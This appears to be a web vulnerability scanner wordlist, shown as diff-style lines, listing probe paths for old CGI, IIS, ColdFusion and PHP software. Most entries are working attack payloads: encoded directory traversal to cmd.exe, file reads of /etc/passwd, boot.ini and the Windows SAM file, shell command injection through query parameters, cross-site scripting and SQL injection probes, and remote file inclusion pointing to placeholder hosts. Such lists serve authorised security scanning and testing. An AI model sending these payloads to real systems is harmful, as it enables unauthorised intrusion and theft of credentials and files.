+admin/db.php
+admin/db.php?dump_sql=1
+admin/exec.php3
+admin/exec.php3?cmd=cat%20/etc/passwd
+admin/exec.php3?cmd=dir%20c:\
+admin/index.php
+admin/login.php?action=insert&username=test&password=test
+admin/login.php?path=\
+admin/modules/cache.php+
+admin/objects.inc.php4
+admin/phpinfo.php
+admin/script.php
+admin/settings.inc.php+
+admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\
+admin/system.php3?cmd=cat%20/etc/passwd
+admin/system.php3?cmd=dir%20c:\
+admin/system_footer.php
+admin/templates/header.php
+admin/upload.php
+admin/wg_user-info.ml
+admin4.nsf
+admin5.nsf
+admin_t/include/aff_liste_langue.php
+administrator/
+administrator/gallery/gallery.php?directory=\
+administrator/gallery/navigation.php?directory=\
+administrator/gallery/uploadimage.php
+administrator/gallery/uploadimage.php?directory=\
+administrator/gallery/view.php?path=\
+administrator/popups/sectionswindow.php?type=web&link=\
+administrator/upload.php?newbanner=1&choice=\
+adminlogin?RCpage=/sysadmin/index.stm
+admisapi/ 
+admisapi/fpadmin.htm
+adpassword.txt
+adsamples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+adsamples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+adsamples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+adsamples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
+adsamples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+adsamples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+adsamples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+adsamples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+adsamples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+adsamples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+adsamples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+adsamples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+adsamples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+adsamples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+adsamples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+adsamples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+adsamples/config/site.csc
+adv/gm001-mc/
+advworks/equipment/catalog_type.asp
+aff_news.php
+agentadmin.php
+agentrunner.nsf
+aillist.pl
+akopia/
+albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
+alog.nsf
+ammerum/
+ampas
+an.sh
+ans.pl?p=../../../../../usr/bin/id|&blah
+ans/ans.pl?p=../../../../../usr/bin/id|&blah
+anthill/login.php
+app.cfm
+approval/ts_app.htm
+archive.asp
+archive/a_domlog.nsf
+archive/l_domlog.nsf
+archive_forum.asp
+ariadne/
+article.php?article=4965&post=1111111111
+article.php?sid=\
+ashnews.php
+asp/SQLQHit.asp
+asp/sqlqhit.asp
+atomicboard/index.php?location=../../../../../../../../../../etc/passwd
+auth.inc.php
+author.asp
+autoexec.bat
+autohtml.php?op=modload&mainfile=x&name=/etc/passwd
+autologon.html?10514
+ava
+axis-cgi/buffer/command.cgi
+axsurvey
+b2-include/b2edit.showposts.php
+b2-tools/gm-2-b2.php
+backup/
+ban.bak
+ban.dat
+ban.log
+bandwidth/index.cgi
+banmat.pwd
+banners.php?op=Change
+banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
+base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
+basilix.php3
+basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
+basilix/
+basilix/compose-attach.php3
+basilix/mbox-list.php3
+basilix/message-read.php3
+bb-dnbd/faxsurvey
+bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+bbs/
+bbs/admin/
+bbs/admin/config/
+bbs/data/
+bbs/db/
+bbs/include/
+bc4j.html
+bdir.htr
+bigconf.cgi
+bigconf.cgi?command=view_textfile&file=/etc/master.passwd&filters=;
+bigsam_guestbook.php?displayBegin=9999...9999
+billing.nsf
+billing/billing.apw
+bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+bin/CGImail.exe
+bin/admin.pl
+bin/cfgwiz.exe
+bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+bin/common/user_update_admin.pl
+bin/common/user_update_passwd.pl
+bin/contents.htm
+bin/fpadmin.htm
+bin/fpremadm.exe
+bin/fpsrvadm.exe
+bin/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+bin/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%u002f../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir
+bin/scripts/../../../../winnt/system32/cmd.exe /c+dir?/c+dir%20c:\
+bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir
+bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
+bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir
+bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
+bin/scripts/.._../winnt/system32/cmd.exe?/c+dir
+bin/scripts/openvendor/gnete/RetrievePNBody.asp
+biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
+biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
+blabla.idq
+blah-whatever-badfile.jsp
+blah-whatever.jsp
+blah123.php
+blah_badfile.shtml
+blahb.ida
+blahb.idq
+board/index.php
+board/philboard_admin.asp+
+boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
+bookmark.nsf
+books.nsf
+bottom.html
+buddies.blt
+buddy.blt
+buddylist.blt
+bugtest+/+
+busytime.nsf
+bytehoard/index.php?infolder=../../../../../../../../../../../etc/
+c/winnt/system32/cmd.exe?/c+dir+/OG
+c32web.exe/ChangeAdminPassword
+ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
+ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
+ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
+ca000001.pl?ACTION=SHOWCART&hop=\
+ca000007.pl?ACTION=SHOWCART&REFPAGE=\
+cache-stats/
+calendar.nsf
+carbo.dll
+card/
+cartcart.cgi
+caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
+caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
+caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
+caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
+caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
+catalog.nsf
+catalog.nsf/
+catalog/includes/include_once.php
+categorie.php3?cid=june
+catinfo
+catinfo?<u><b>TESTING
+caupo/admin/admin_workspace.php
+cbms/cbmsfoot.php
+cbms/changepass.php
+cbms/editclient.php
+cbms/passgen.php
+cbms/realinv.php
+cbms/usersetup.php
+ccbill/whereami.cgi
+cd-cgi/sscd_suncourier.pl
+cersvr.nsf
+certa.nsf
+certlog.nsf
+certsrv.nsf
+certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
+certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
+cfappman/index.cfm
+cfcache.map
+cfdocs.map
+cfdocs/cfcache.map
+cfdocs/cfmlsyntaxcheck.cfm
+cfdocs/exampleapp/docs/sourcewindow.cfm
+cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
+cfdocs/exampleapp/email/getfile.cfm
+cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
+cfdocs/exampleapp/publish/admin/addcontent.cfm
+cfdocs/examples/cvbeans/beaninfo.cfm
+cfdocs/examples/httpclient/mainframeset.cfm
+cfdocs/examples/parks/detail.cfm
+cfdocs/expelval/displayopenedfile.cfm
+cfdocs/expelval/exprcalc.cfm
+cfdocs/expelval/openfile.cfm
+cfdocs/expelval/sendmail.cfm
+cfdocs/expeval/ExprCalc.cfm
+cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._
+cfdocs/expeval/displayopenedfile.cfm
+cfdocs/expeval/eval.cfm
+cfdocs/expeval/exprcalc.cfm
+cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
+cfdocs/expeval/openfile.cfm
+cfdocs/expeval/sendmail.cfm
+cfdocs/root.cfm
+cfdocs/snippets/evaluate.cfm
+cfdocs/snippets/fileexists.cfm
+cfdocs/snippets/gettempdirectory.cfm
+cfdocs/snippets/viewexample.cfm
+cfide/Administrator/startstop.html
+cfide/administrator/index.cfm
+cfusion/cfapps/forums/data/forums.mdb
+cfusion/cfapps/security/data/realm.mdb
+cfusion/cfapps/security/realm_.mdb
+cfusion/database/cfsnippets.mdb
+cfusion/database/cypress.mdb
+cfusion/database/smpolicy.mdb
+cgi-auth/userreg.cgi
+cgi-bin
+cgi-bin-sdb
+cgi-bin-sdb/printenv
+cgi-bin/
+cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
+cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
+cgi-bin/%2e%2e/abyss.conf
+cgi-bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+cgi-bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+cgi-bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+cgi-bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
+cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+cgi-bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ f
+cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+cgi-bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+cgi-bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+cgi-bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
+cgi-bin/../../../../winnt/system32/cmd.exe
+cgi-bin/..\..\..\../winnt/system32/cmd.exe
+cgi-bin/..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\
+cgi-bin/.._../winnt/system32/cmd.exe?/c+dir
+cgi-bin/.access
+cgi-bin/.cobalt
+cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
+cgi-bin/.fhp
+cgi-bin/.htaccess
+cgi-bin/.htaccess.old
+cgi-bin/.htaccess.save
+cgi-bin/.htaccess~
+cgi-bin/.htpasswd
+cgi-bin/.namazu.cgi
+cgi-bin/.nsconfig
+cgi-bin/.passwd
+cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
+cgi-bin//_vti_pvt/doctodep.btr
+cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/AT-admin.cgi
+cgi-bin/AT-generate.cgi
+cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
+cgi-bin/AnyBoard.cgi
+cgi-bin/AnyForm
+cgi-bin/AnyForm2
+cgi-bin/Board/db/
+cgi-bin/CGImail.exe
+cgi-bin/CSMailto.cgi
+cgi-bin/CSMailto/CSMailto.cgi
+cgi-bin/Cgitest.exe
+cgi-bin/Count.cgi
+cgi-bin/CrazyWWWBoard.cgi
+cgi-bin/DCFORMS98.CGI
+cgi-bin/DCShop/auth_data/auth_user_file.txt
+cgi-bin/DCShop/orders/orders.txt
+cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
+cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
+cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
+cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
+cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
+cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
+cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
+cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
+cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
+cgi-bin/GW5
+cgi-bin/GW5/GWWEB.EXE
+cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
+cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
+cgi-bin/GW5/GWWEB.EXE?HELP=somewhereovertherainbow
+cgi-bin/GWWEB.EXE
+cgi-bin/GWWEB.EXE?HELP=bad-request
+cgi-bin/ImageFolio/admin/admin.cgi
+cgi-bin/LWGate
+cgi-bin/LWGate.cgi
+cgi-bin/MachineInfo
+cgi-bin/MsmMask.exe
+cgi-bin/MsmMask.exe?mask=/junk334
+cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
+cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
+cgi-bin/Pbcgi.exe
+cgi-bin/SGB_DIR/superguestconfig
+cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
+cgi-bin/Search.pl
+cgi-bin/Upload.pl
+cgi-bin/VsSetCookie.exe?
+cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
+cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
+cgi-bin/WS_FTP.ini
+cgi-bin/Web_Store/web_store.cgi
+cgi-bin/Webnews.exe
+cgi-bin/Xrun.cgi
+cgi-bin/YaBB.pl
+cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
+cgi-bin/_vti_cnf
+cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
+cgi-bin/ad.cgi
+cgi-bin/adcycle
+cgi-bin/add_ftp.cgi
+cgi-bin/addbanner.cgi
+cgi-bin/adduser.cgi
+cgi-bin/admin.cgi
+cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
+cgi-bin/admin.php
+cgi-bin/admin.php3
+cgi-bin/admin.pl
+cgi-bin/admin/admin
+cgi-bin/admin/admin.cgi
+cgi-bin/admin/setup.cgi
+cgi-bin/adminhot.cgi
+cgi-bin/adminwww.cgi
+cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+cgi-bin/aglimpse
+cgi-bin/aglimpse.cgi
+cgi-bin/alibaba.pl
+cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
+cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+cgi-bin/allmanage.pl
+cgi-bin/allmanageup.pl
+cgi-bin/amadmin.pl
+cgi-bin/amlite/amadmin.pl
+cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
+cgi-bin/anacondaclip.pl?template=check
+cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
+cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
+cgi-bin/anyboard.cgi
+cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
+cgi-bin/archie
+cgi-bin/architext_query.cgi
+cgi-bin/architext_query.pl
+cgi-bin/ash
+cgi-bin/astrocam.cgi
+cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
+cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
+cgi-bin/auctiondeluxe/auction.pl
+cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
+cgi-bin/auktion.pl
+cgi-bin/auth_data/auth_user_file.txt
+cgi-bin/awl/auctionweaver.pl
+cgi-bin/awstats.pl
+cgi-bin/ax-admin.cgi
+cgi-bin/ax.cgi
+cgi-bin/axs.cgi
+cgi-bin/badmin.cgi
+cgi-bin/banner.cgi
+cgi-bin/bannereditor.cgi
+cgi-bin/bash
+cgi-bin/bb-ack.sh
+cgi-bin/bb-hist.sh
+cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
+cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
+cgi-bin/bb-histlog.sh
+cgi-bin/bb-hostsvc.sh
+cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
+cgi-bin/bb-rep.sh
+cgi-bin/bb-replog.sh
+cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+cgi-bin/bbs_forum.cgi
+cgi-bin/bigconf.cgi
+cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
+cgi-bin/bizdb1-search.cgi
+cgi-bin/blog/
+cgi-bin/blog/mt-check.cgi
+cgi-bin/blog/mt-load.cgi
+cgi-bin/blog/mt.cfg
+cgi-bin/bnbform
+cgi-bin/bnbform.cgi
+cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
+cgi-bin/boozt/admin/index.cgi?section=5&input=1
+cgi-bin/bsguest.cgi
+cgi-bin/bslist.cgi
+cgi-bin/build.cgi
+cgi-bin/bulk/bulk.cgi
+cgi-bin/c32web.exe/ChangeAdminPassword
+cgi-bin/c32web.exe/CheckError?error=53
+cgi-bin/c32web.exe/ShowAdminDir
+cgi-bin/c_download.cgi
+cgi-bin/cached_feed.cgi
+cgi-bin/cachemgr.cgi
+cgi-bin/cal_make.pl
+cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
+cgi-bin/calendar
+cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+cgi-bin/calendar.pl
+cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
+cgi-bin/calendar/index.cgi
+cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
+cgi-bin/calender.pl
+cgi-bin/calender_admin.pl
+cgi-bin/campas
+cgi-bin/campas?%0acat%0a/etc/passwd%0a
+cgi-bin/cart.pl
+cgi-bin/cart.pl?db='
+cgi-bin/cart32.exe
+cgi-bin/cartmanager.cgi
+cgi-bin/cbmc/forums.cgi
+cgi-bin/ceilidh.exe
+cgi-bin/cfgwiz.exe
+cgi-bin/cgforum.cgi
+cgi-bin/cgi-lib.pl
+cgi-bin/cgi-test.exe
+cgi-bin/cgi_process
+cgi-bin/cgicso?query=AAA
+cgi-bin/cgiforum.pl
+cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
+cgi-bin/cgimail.exe
+cgi-bin/cgitest.exe
+cgi-bin/cgiwrap
+cgi-bin/cgiwrap/%3Cfont%20color=red%3E
+cgi-bin/cgiwrap/~@USERS
+cgi-bin/cgiwrap/~JUNK(5)
+cgi-bin/cgiwrap/~root
+cgi-bin/change-your-password.pl
+cgi-bin/changepw.cgi
+cgi-bin/changepw.exe
+cgi-bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+cgi-bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+cgi-bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+cgi-bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+cgi-bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+cgi-bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+cgi-bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+cgi-bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+cgi-bin/class/mysql.class
+cgi-bin/classified.cgi
+cgi-bin/classifieds
+cgi-bin/classifieds.cgi
+cgi-bin/classifieds/classifieds.cgi
+cgi-bin/classifieds/index.cgi
+cgi-bin/clickcount.pl?view=test
+cgi-bin/clickresponder.pl
+cgi-bin/cmd.exe?/c+dir
+cgi-bin/cmd1.exe?/c+dir
+cgi-bin/code.php
+cgi-bin/code.php3
+cgi-bin/com5..........................................................................................................................................................................................................................box
+cgi-bin/com5.java
+cgi-bin/com5.pl
+cgi-bin/commandit.cgi
+cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
+cgi-bin/commerce.cgi?page=check
+cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
+cgi-bin/common/listrec.pl
+cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
+cgi-bin/compatible.cgi
+cgi-bin/contents.htm
+cgi-bin/count.cgi
+cgi-bin/counter-ord
+cgi-bin/counterbanner
+cgi-bin/counterbanner-ord
+cgi-bin/counterfiglet-ord
+cgi-bin/counterfiglet/nc/
+cgi-bin/counterfiglet/nc/f
+cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/csNews.cgi
+cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/csPassword.cgi
+cgi-bin/csPassword/csPassword.cgi
+cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
+cgi-bin/csh
+cgi-bin/cstat.pl
+cgi-bin/cutecast/members/
+cgi-bin/cvsweb/cvsweb.cgi
+cgi-bin/dasp/fm_shell.asp
+cgi-bin/data/fetch.php?page=
+cgi-bin/date
+cgi-bin/day5datacopier.cgi
+cgi-bin/day5datanotifier.cgi
+cgi-bin/db2www/library/document.d2w/show
+cgi-bin/db4web_c/dbdirname//etc/passwd
+cgi-bin/db_manager.cgi
+cgi-bin/dbman/db.cgi?db=no-db
+cgi-bin/dcadmin.cgi
+cgi-bin/dcboard.cgi
+cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
+cgi-bin/dcforumlib.pl
+cgi-bin/dcshop/auth_data/auth_user_file.txt
+cgi-bin/dcshop/orders/orders.txt
+cgi-bin/dfire.cgi
+cgi-bin/diagnose.cgi
+cgi-bin/dig.cgi
+cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
+cgi-bin/displayTC.pl
+cgi-bin/dmailweb.cgi
+cgi-bin/dnewsweb
+cgi-bin/dnewsweb.cgi
+cgi-bin/donothing
+cgi-bin/dose.pl
+cgi-bin/download.cgi
+cgi-bin/dumpenv.pl
+cgi-bin/echo.bat
+cgi-bin/echo.bat?&dir+c:\
+cgi-bin/edit.pl
+cgi-bin/empower?DB=UkRteamHole
+cgi-bin/empower?DB=whateverwhatever
+cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/enter.cgi
+cgi-bin/environ.cgi
+cgi-bin/environ.pl
+cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
+cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
+cgi-bin/everythingform.cgi
+cgi-bin/ex-logger.pl
+cgi-bin/excite
+cgi-bin/excite;IFS=\
+cgi-bin/ezadmin.cgi
+cgi-bin/ezboard.cgi
+cgi-bin/ezman.cgi
+cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
+cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
+cgi-bin/ezshopper2/loadpage.cgi
+cgi-bin/ezshopper3/loadpage.cgi
+cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
+cgi-bin/faxsurvey
+cgi-bin/faxsurvey?cat%20/etc/passwd
+cgi-bin/filemail
+cgi-bin/filemail.pl
+cgi-bin/files.pl
+cgi-bin/finger
+cgi-bin/finger.cgi
+cgi-bin/finger.pl
+cgi-bin/flexform
+cgi-bin/flexform.cgi
+cgi-bin/formmail
+cgi-bin/formmail.cgi
+cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+cgi-bin/formmail.pl
